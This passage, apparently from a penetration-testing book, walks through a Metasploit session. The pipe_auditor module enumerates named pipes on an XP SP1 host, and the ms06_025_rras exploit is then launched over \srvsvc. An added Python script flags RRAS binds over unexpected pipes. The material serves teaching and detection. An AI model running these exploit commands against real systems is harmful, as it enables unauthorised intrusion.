Looks like Metasploit 3 also knows how to play with wireless drivers... Interesting... But for now, let's keep focused on our XP SP1 RRAS exploit by enumerating the exposed named pipes.
NOTE Chapter 16 talks more about named pipes, including elevation of
privilege attack techniques abusing weak access control on named pipes.
msf exploit(ms06_025_rras) > use scanner/smb/pipe_auditor
msf auxiliary(pipe_auditor) > show options
Module options:

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS                   yes       The target address range or CIDR identifier
msf auxiliary(pipe_auditor) > set RHOSTS 192.168.1.220
RHOSTS => 192.168.1.220
msf auxiliary(pipe_auditor) > exploit
[*] Pipes: \netlogon, \lsarpc, \samr, \epmapper, \srvsvc, \wkssvc
[*] Auxiliary module execution completed
The exploit description turns out to be correct. The ROUTER named pipe either does not exist on XP SP1 or is not exposed anonymously. \srvsvc is in the list, however, so we'll instead target the RRAS RPC interface over the \srvsvc named pipe.
msf auxiliary(pipe_auditor) > use windows/smb/ms06_025_rras
msf exploit(ms06_025_rras) > set SMBPIPE SRVSVC
SMBPIPE => SRVSVC
msf exploit(ms06_025_rras) > exploit
[*] Started bind handler
[*] Binding to 20610036-fa22-11cf-9823-00a0c911e5df:1.
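The transcript above shows the defender-relevant detail: the RRAS interface (UUID 20610036-fa22-11cf-9823-00a0c911e5df) gets bound over \srvsvc rather than over its own \ROUTER pipe, so monitoring by pipe name alone misses it. The following is an added illustration, not code from the book: it parses the pipe_auditor output line and flags RPC bind events that reach the RRAS interface over any pipe other than \ROUTER. The event dictionary fields and the sample events are constructed for this example, not a real log schema.

```python
import re

# Interface UUID shown in the bind line of the transcript above (RRAS RPC interface, v1).
RRAS_IFACE = "20610036-fa22-11cf-9823-00a0c911e5df"
# Pipe the RRAS service is expected to serve that interface on; a bind over
# any other pipe (such as the broadly reachable \srvsvc) is worth an alert.
EXPECTED_PIPE = "\\ROUTER"

# Matches the "[*] Pipes: \a, \b, ..." line printed by scanner/smb/pipe_auditor.
PIPES_RE = re.compile(r"^\[\*\] Pipes:\s*(.+)$", re.M)


def parse_pipe_auditor(console_output: str) -> set:
    """Return the set of pipe names pipe_auditor reports as reachable."""
    pipes = set()
    for m in PIPES_RE.finditer(console_output):
        pipes.update(p.strip() for p in m.group(1).split(","))
    return pipes


def flag_rras_binds(events: list) -> list:
    """Return one alert string per bind to the RRAS interface over an unexpected pipe.

    Each event is a constructed dict {"src": ip, "pipe": name, "iface": uuid};
    the field names are an assumption for this example.
    """
    alerts = []
    for ev in events:
        if ev["iface"].lower() != RRAS_IFACE:
            continue  # some other interface; not what we are watching for
        if ev["pipe"].upper() != EXPECTED_PIPE.upper():
            alerts.append(f"{ev['src']} bound RRAS interface over {ev['pipe']} "
                          f"(expected {EXPECTED_PIPE})")
    return alerts


# Constructed sample input: the pipe_auditor line from the transcript plus
# three made-up bind events (the third uses a made-up, unrelated interface UUID).
SAMPLE_OUTPUT = "[*] Pipes: \\netlogon, \\lsarpc, \\samr, \\epmapper, \\srvsvc, \\wkssvc\n"
SAMPLE_EVENTS = [
    {"src": "192.168.1.10", "pipe": "\\ROUTER", "iface": RRAS_IFACE},
    {"src": "192.168.1.10", "pipe": "\\srvsvc", "iface": RRAS_IFACE},
    {"src": "192.168.1.11", "pipe": "\\srvsvc", "iface": "11111111-2222-3333-4444-555555555555"},
]

if __name__ == "__main__":
    print(sorted(parse_pipe_auditor(SAMPLE_OUTPUT)))
    for alert in flag_rras_binds(SAMPLE_EVENTS):
        print(alert)
```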